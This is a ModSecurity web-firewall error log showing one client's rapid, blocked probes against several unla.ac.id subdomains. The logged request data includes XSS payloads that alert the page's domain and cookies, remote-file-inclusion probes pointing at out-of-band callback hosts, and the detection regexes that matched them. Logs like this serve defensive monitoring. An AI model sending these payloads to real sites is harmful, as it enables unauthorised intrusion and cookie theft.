[Tue Aug 29 11:54:00.653130 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAApQ2V4AAAAb"]
[Tue Aug 29 11:54:00.717542 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAoAk3gAAAAC"]
[Tue Aug 29 11:54:00.719894 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAoGFhoAAAAE"]
[Tue Aug 29 11:54:00.719974 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApPcvgAAAAa"]
[Tue Aug 29 11:54:00.721228 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAo2m88AAAAA"]
[Tue Aug 29 11:54:00.747913 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAn40-0AAAAW"]
[Tue Aug 29 11:54:00.751799 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAoGFhsAAAAE"]
[Tue Aug 29 11:54:01.629554 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAolKckAAAAe"]
[Tue Aug 29 11:54:01.640749 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAoGFhwAAAAE"]
[Tue Aug 29 11:54:01.667659 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAoAk3oAAAAC"]
[Tue Aug 29 11:54:01.682679 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAAn41AAAAAAW"]
[Tue Aug 29 11:54:01.695489 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156cCo-f0AAAolKcoAAAAe"]
[Tue Aug 29 11:54:01.695737 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApHRYQAAAAP"]
[Tue Aug 29 11:54:01.746102 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156cCo-f0AAApQ2WMAAAAb"]
[Tue Aug 29 11:54:01.846586 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156cCo-f0AAAo2m9QAAAAA"]
[Tue Aug 29 11:54:02.635325 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAoZ6WcAAAAK"]
[Tue Aug 29 11:54:02.641252 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156sCo-f0AAAoAk38AAAAC"]
[Tue Aug 29 11:54:02.652121 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAox7NMAAAAN"]
[Tue Aug 29 11:54:02.694631 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAox7NUAAAAN"]
[Tue Aug 29 11:54:02.694800 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAApLWmoAAAAI"]
[Tue Aug 29 11:54:02.703891 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAApOdd0AAAAL"]
[Tue Aug 29 11:54:03.800243 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO1568Co-f0AAAowNvUAAAAH"]
[Tue Aug 29 11:54:04.656067 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAolKdYAAAAe"]
[Tue Aug 29 11:54:04.659538 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAoZ6W0AAAAK"]
[Tue Aug 29 11:54:04.668319 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAApLWm8AAAAI"]
[Tue Aug 29 11:54:04.699890 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAolKdcAAAAe"]
[Tue Aug 29 11:54:04.701000 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAo2m@MAAAAA"]
[Tue Aug 29 11:54:04.869517 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAolKdkAAAAe"]
[Tue Aug 29 11:54:04.872617 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAo2m@UAAAAA"]
[Tue Aug 29 11:54:04.873032 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAoZ6XAAAAAK"]
[Tue Aug 29 11:54:04.874824 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO157MCo-f0AAApQ2XUAAAAb"]
[Tue Aug 29 11:54:04.889657 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAowNwIAAAAH"]
[Tue Aug 29 11:54:04.891860 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAo2m@YAAAAA"]
[Tue Aug 29 11:54:05.666258 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157cCo-f0AAApJDXQAAAAY"]
